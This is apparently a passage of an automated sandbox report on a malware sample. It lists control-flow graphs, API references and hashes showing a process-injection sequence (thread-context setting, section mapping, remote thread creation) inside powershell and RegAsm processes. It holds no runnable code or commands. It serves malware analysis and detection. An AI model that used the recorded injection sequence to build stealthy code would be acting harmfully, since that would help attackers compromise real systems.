                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: cb6e362789bbc66077daea1670796f58ce4e5b1c9cb24fffc8db9b4158a7fd4d
                                                      • Instruction ID: 58c2de7746f009fff3819a7227ccbc1bb038203320fd37f4afe7032b764a79ca
                                                      • Opcode Fuzzy Hash: cb6e362789bbc66077daea1670796f58ce4e5b1c9cb24fffc8db9b4158a7fd4d
                                                      • Instruction Fuzzy Hash: 5F4177B5D042589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7350D375AA45CB64

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 418 555c61-555cc4 419 555cc6-555cd8 418->419 420 555cdb-555d22 Wow64SetThreadContext 418->420 419->420 421 555d24-555d2a 420->421 422 555d2b-555d63 420->422 421->422
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: b4c26b3422080f5b1d530d1c9caecc536a1365c9834f588ab74e21e603f6960e
                                                      • Instruction ID: 157de64ced3839f518fa3b74d3382f71ab8fbe71c037fc61cea7486b2e9775f4
                                                      • Opcode Fuzzy Hash: b4c26b3422080f5b1d530d1c9caecc536a1365c9834f588ab74e21e603f6960e
                                                      • Instruction Fuzzy Hash: A231ADB5D012589FCB10CFA9D584ADDFBF1BB49314F24806AE815B7350D3789949CF54

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 402 551738-555cc4 404 555cc6-555cd8 402->404 405 555cdb-555d22 Wow64SetThreadContext 402->405 404->405 406 555d24-555d2a 405->406 407 555d2b-555d63 405->407 406->407
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 7d3f3fd25cbeab5b4c4dd2ba8890afcd9d23f02a464bf440770fd2ae5d7fade4
                                                      • Instruction ID: 305e580b76cd797e5f6a054dad13cc3324458184d97a77d4477f51b2203621f6
                                                      • Opcode Fuzzy Hash: 7d3f3fd25cbeab5b4c4dd2ba8890afcd9d23f02a464bf440770fd2ae5d7fade4
                                                      • Instruction Fuzzy Hash: 73319DB5D012589FCB10CF99D594ADEFBF5BB49314F24802AE815B7310D3749A49CF64

                                                      Control-flow Graph

                                                      control_flow_graph 410 551780-555cc4 412 555cc6-555cd8 410->412 413 555cdb-555d22 Wow64SetThreadContext 410->413 412->413 414 555d24-555d2a 413->414 415 555d2b-555d63 413->415 414->415
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00555D12
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: d12f5c96abfaef160b41f55f641394fd9d95cebf83cc168c54020d4efd5e2543
                                                      • Instruction ID: a5ce0e891cbe5f34c863894edf0342eae13cf7f0c435b25c89f06b0ec6e06878
                                                      • Opcode Fuzzy Hash: d12f5c96abfaef160b41f55f641394fd9d95cebf83cc168c54020d4efd5e2543
                                                      • Instruction Fuzzy Hash: 7231ADB5D012589FCB10CF99D584ADDFBF1BB49310F24802AE818B7310D374AA49CF64

                                                      Control-flow Graph

                                                      control_flow_graph 425 5560d0-55615e ResumeThread 427 556167-556195 425->427 428 556160-556166 425->428 428->427
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0055614E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 000a5f465f4e71d0d4c85aa7d63b709ff99bb873f071232edc548afa4f4726ab
                                                      • Instruction ID: 49dce265956ac09f49d99ada0a6375d973077e5f9cb45ebf80572e5beb208c3c
                                                      • Opcode Fuzzy Hash: 000a5f465f4e71d0d4c85aa7d63b709ff99bb873f071232edc548afa4f4726ab
                                                      • Instruction Fuzzy Hash: F2219BB9D042489FCB10CFA9D584AEEFBF4BB49320F24905AE818B7310D374A945CFA4

                                                      Control-flow Graph

                                                      control_flow_graph 431 551798-55615e ResumeThread 433 556167-556195 431->433 434 556160-556166 431->434 434->433
                                                      APIs
                                                      • ResumeThread.KERNELBASE(?), ref: 0055614E
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363624944.0000000000550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_550000_powershell.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 53936da8dd8fc45941145d2a719ce161a58b261e2e9680f70c9e10785c814859
                                                      • Instruction ID: a23a298c7733008851ca822e37765e14dc776eeedac88efbd1791d444a355da7
                                                      • Opcode Fuzzy Hash: 53936da8dd8fc45941145d2a719ce161a58b261e2e9680f70c9e10785c814859
                                                      • Instruction Fuzzy Hash: 37218CB8D042589FCB10CFA9D584AEEFBF4BB49310F24946AE818B7310D374A945CFA5
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363563690.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_1ed000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 335d8be87d1cd0ef9a97ff6ab4498bf81df2babeb1b1c3520a714c5fe43cc4be
                                                      • Instruction ID: 31582164df6d9ea605d2907bdaa490ee8d2c1cfe74c91e014259f7e635cba7df
                                                      • Opcode Fuzzy Hash: 335d8be87d1cd0ef9a97ff6ab4498bf81df2babeb1b1c3520a714c5fe43cc4be
                                                      • Instruction Fuzzy Hash: 5401A271504780AEE7205E2AE984B6BFFD8EF41724F2C841AFC494B286C779D845CAB1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363563690.00000000001ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 001ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_1ed000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dcda0eb21df8cdb11df20c216574c5e52b47f478f39104e8d697939fb3d10931
                                                      • Instruction ID: 0c02ca2936b494fd26fe6d6042c4eec4db4fe4669697be3e83a4d0f0edb865b3
                                                      • Opcode Fuzzy Hash: dcda0eb21df8cdb11df20c216574c5e52b47f478f39104e8d697939fb3d10931
                                                      • Instruction Fuzzy Hash: 6A012D6140E7C05FD7124B259C94B66BFB4DF43224F1D81DBE8888F1A7C2699848C772
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (:}$(:}$(:}$L4p$L4p$L4p$L4p$L4p$L4p$L:}$L:}$L:}
                                                      • API String ID: 0-1774546207
                                                      • Opcode ID: a892f64c9af21c8fd4002f39bdd5b1642e3bcb874ec1723ae0eb4c4e85fe2d4e
                                                      • Instruction ID: 52c61adca39a7d8a1b0b5071d7d027a981296f67a127063b71ff723739b06251
                                                      • Opcode Fuzzy Hash: a892f64c9af21c8fd4002f39bdd5b1642e3bcb874ec1723ae0eb4c4e85fe2d4e
                                                      • Instruction Fuzzy Hash: D2D14335700248EFCB65AF68D814BAE7BA2FFC5310F188466E945DB291CB70DD49CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: h<}$$p$$p$$p
                                                      • API String ID: 0-2836683382
                                                      • Opcode ID: fffeedf73c2cfd99ecd7a8c1b3e7978b9b0d0b465575a65cb88ac66530ff3252
                                                      • Instruction ID: b1c6ec1935d10f42ea5a150ec63cf66330db272461bd55ffe537cc135d11efd7
                                                      • Opcode Fuzzy Hash: fffeedf73c2cfd99ecd7a8c1b3e7978b9b0d0b465575a65cb88ac66530ff3252
                                                      • Instruction Fuzzy Hash: A9511375B043059FCF24AA69884876BBBEAFBC1310F68846AD846DB251DE71DC42C7A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.363671503.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_880000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'p$4'p$$p$$p
                                                      • API String ID: 0-377911355
                                                      • Opcode ID: 16c433fb7111329ca6c4c7d1881ee2c6c3ad5379ec88f5bee7074d6a76d4486b
                                                      • Instruction ID: 0449303a2b9ca08fd3a32a464c073dc6972cc6c7b2c240b63b1d8fc84512a212
                                                      • Opcode Fuzzy Hash: 16c433fb7111329ca6c4c7d1881ee2c6c3ad5379ec88f5bee7074d6a76d4486b
                                                      • Instruction Fuzzy Hash: 07015E2560D3C14FC76A226818205A9AFB2ABD32507AE41DBD1D1CF297C9558C0AC7A6

                                                      Execution Graph

                                                      Execution Coverage: 8.9%
                                                      Dynamic/Decrypted Code Coverage: 0%
                                                      Signature Coverage: 52.9%
                                                      Total number of Nodes: 68
                                                      Total number of Limit Nodes: 2
                                                      execution_graph 2000 402d65 2001 402d69 2000->2001 2002 4018a6 8 API calls 2001->2002 2003 402ea5 2001->2003 2002->2003 2008 401706 2009 4016ea 2008->2009 2011 401789 2009->2011 2012 4017b4 2011->2012 2015 40328d 2012->2015 2014 4017e8 2014->2009 2017 40327d 2015->2017 2018 40323d 2015->2018 2016 4032a1 Sleep 2016->2018 2017->2014 2018->2015 2018->2016 2018->2017 2104 4018b1 2105 401903 2104->2105 2107 4018b5 2104->2107 2106 4014bf 7 API calls 2105->2106 2109 40191a 2105->2109 2106->2109 2108 4018ee Sleep 2107->2108 2108->2105 2047 4014d6 2048 4014c4 2047->2048 2049 40156f NtDuplicateObject 2048->2049 2057 40168b 2048->2057 2050 40158c NtCreateSection 2049->2050 2049->2057 2051 4015b2 NtMapViewOfSection 2050->2051 2052 40160c NtCreateSection 2050->2052 2051->2052 2053 4015d5 NtMapViewOfSection 2051->2053 2054 401638 2052->2054 2052->2057 2053->2052 2055 4015f3 2053->2055 2056 401642 NtMapViewOfSection 2054->2056 2054->2057 2055->2052 2056->2057 2058 401669 NtMapViewOfSection 2056->2058 2058->2057 1996 402f5d 1997 4030b4 1996->1997 1998 402f87 1996->1998 1998->1997 1999 403042 RtlCreateUserThread NtTerminateProcess 1998->1999 1999->1997 1970 402dfe 1971 402dee 1970->1971 1973 402ea5 1971->1973 1974 4018a6 1971->1974 1975 4018b7 1974->1975 1976 4018ee Sleep 1975->1976 1977 401903 1976->1977 1979 40191a 1977->1979 1980 4014bf 1977->1980 1979->1973 1981 4014ce 1980->1981 1982 40156f NtDuplicateObject 1981->1982 1988 40168b 1981->1988 1983 40158c NtCreateSection 1982->1983 1982->1988 1984 4015b2 NtMapViewOfSection 1983->1984 1985 40160c NtCreateSection 1983->1985 1984->1985 1986 4015d5 NtMapViewOfSection 1984->1986 1987 401638 1985->1987 1985->1988 1986->1985 1989 4015f3 1986->1989 1987->1988 1990 401642 NtMapViewOfSection 1987->1990 1988->1979 1989->1985 1990->1988 1991 401669 NtMapViewOfSection 1990->1991 1991->1988 2110 4018be 2111 4018b7 2110->2111 2112 4018ee Sleep 2111->2112 2113 401903 2112->2113 2114 4014bf 7 API calls 2113->2114 2115 40191a 2113->2115 2114->2115 2116 4016be 2117 4016d3 2116->2117 2118 401789 Sleep 2117->2118 2118->2117 1992 4030bf 1993 403055 RtlCreateUserThread NtTerminateProcess 1992->1993 1995 4030d1 1992->1995 1994 4030b4 1993->1994 1995->1995

                                                      Control-flow Graph

                                                      control_flow_graph 0 4014d6-4014d7 1 4014c4-4014c8 0->1 2 4014d8-401519 call 401164 0->2 1->2 13 40151b 2->13 14 40151e-401523 2->14 13->14 16 401529-40153a 14->16 17 40184d-401855 14->17 21 401540-401569 16->21 22 40184b 16->22 17->14 20 40185a-401883 17->20 30 401874-40187f 20->30 31 401886-4018a3 call 401164 20->31 21->22 29 40156f-401586 NtDuplicateObject 21->29 22->20 29->22 32 40158c-4015b0 NtCreateSection 29->32 30->31 34 4015b2-4015d3 NtMapViewOfSection 32->34 35 40160c-401632 NtCreateSection 32->35 34->35 37 4015d5-4015f1 NtMapViewOfSection 34->37 35->22 38 401638-40163c 35->38 37->35 41 4015f3-401609 37->41 38->22 42 401642-401663 NtMapViewOfSection 38->42 41->35 42->22 44 401669-401685 NtMapViewOfSection 42->44 44->22 46 40168b call 401690 44->46
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$CreateDuplicateObjectView
                                                      • String ID:
                                                      • API String ID: 1652636561-0
                                                      • Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                      • Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
                                                      • Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
                                                      • Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

                                                      Control-flow Graph

                                                      control_flow_graph 48 4014bf-4014c8 49 4014d8 48->49 50 4014ce-401519 call 401164 48->50 49->50 60 40151b 50->60 61 40151e-401523 50->61 60->61 63 401529-40153a 61->63 64 40184d-401855 61->64 68 401540-401569 63->68 69 40184b 63->69 64->61 67 40185a-401883 64->67 77 401874-40187f 67->77 78 401886-4018a3 call 401164 67->78 68->69 76 40156f-401586 NtDuplicateObject 68->76 69->67 76->69 79 40158c-4015b0 NtCreateSection 76->79 77->78 81 4015b2-4015d3 NtMapViewOfSection 79->81 82 40160c-401632 NtCreateSection 79->82 81->82 84 4015d5-4015f1 NtMapViewOfSection 81->84 82->69 85 401638-40163c 82->85 84->82 88 4015f3-401609 84->88 85->69 89 401642-401663 NtMapViewOfSection 85->89 88->82 89->69 91 401669-401685 NtMapViewOfSection 89->91 91->69 93 40168b call 401690 91->93
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$View$Create$DuplicateObject
                                                      • String ID:
                                                      • API String ID: 1546783058-0
                                                      • Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                      • Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
                                                      • Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
                                                      • Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

                                                      Control-flow Graph

                                                      control_flow_graph 95 4014e8 96 4014e0-4014e5 95->96 97 4014ec-401519 call 401164 95->97 96->97 103 40151b 97->103 104 40151e-401523 97->104 103->104 106 401529-40153a 104->106 107 40184d-401855 104->107 111 401540-401569 106->111 112 40184b 106->112 107->104 110 40185a-401883 107->110 120 401874-40187f 110->120 121 401886-4018a3 call 401164 110->121 111->112 119 40156f-401586 NtDuplicateObject 111->119 112->110 119->112 122 40158c-4015b0 NtCreateSection 119->122 120->121 124 4015b2-4015d3 NtMapViewOfSection 122->124 125 40160c-401632 NtCreateSection 122->125 124->125 127 4015d5-4015f1 NtMapViewOfSection 124->127 125->112 128 401638-40163c 125->128 127->125 131 4015f3-401609 127->131 128->112 132 401642-401663 NtMapViewOfSection 128->132 131->125 132->112 134 401669-401685 NtMapViewOfSection 132->134 134->112 136 40168b call 401690 134->136
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$View$Create$DuplicateObject
                                                      • String ID:
                                                      • API String ID: 1546783058-0
                                                      • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                      • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                      • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                      • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24

                                                      Control-flow Graph

                                                      control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 160 401874-40187f 150->160 161 401886-4018a3 call 401164 150->161 151->152 159 40156f-401586 NtDuplicateObject 151->159 152->150 159->152 162 40158c-4015b0 NtCreateSection 159->162 160->161 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->152 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                      APIs
                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Section$View$Create$DuplicateObject
                                                      • String ID:
                                                      • API String ID: 1546783058-0
                                                      • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                      • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                      • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                      • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                                      Control-flow Graph

                                                      control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateProcessTerminateThreadUser
                                                      • String ID:
                                                      • API String ID: 1921587553-0
                                                      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                      • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                      • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

                                                      Control-flow Graph

                                                      • Rendered graph omitted; basic blocks 4030bf-403145 (with 403055-4030b9), calling RtlCreateUserThread, NtTerminateProcess and the subroutine at 4011db
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateProcessTerminateThreadUser
                                                      • String ID:
                                                      • API String ID: 1921587553-0
                                                      • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                      • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                      • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                      • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

                                                      Control-flow Graph

                                                      • Rendered graph omitted; basic blocks 4018c5-40195b, calling Sleep and the subroutines at 401164, 4013cc and 4014bf
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID: zOji
                                                      • API String ID: 4152845823-4118548424
                                                      • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                      • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                      • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                      • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                                      Control-flow Graph

                                                      • Rendered graph omitted; basic blocks 4018a6-40195b, calling Sleep and the subroutines at 401164, 4013cc and 4014bf
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                      • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                      • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                      • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                                      Control-flow Graph

                                                      • Rendered graph omitted; basic blocks 4018be-40195b, calling Sleep and the subroutines at 401164, 4013cc and 4014bf
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
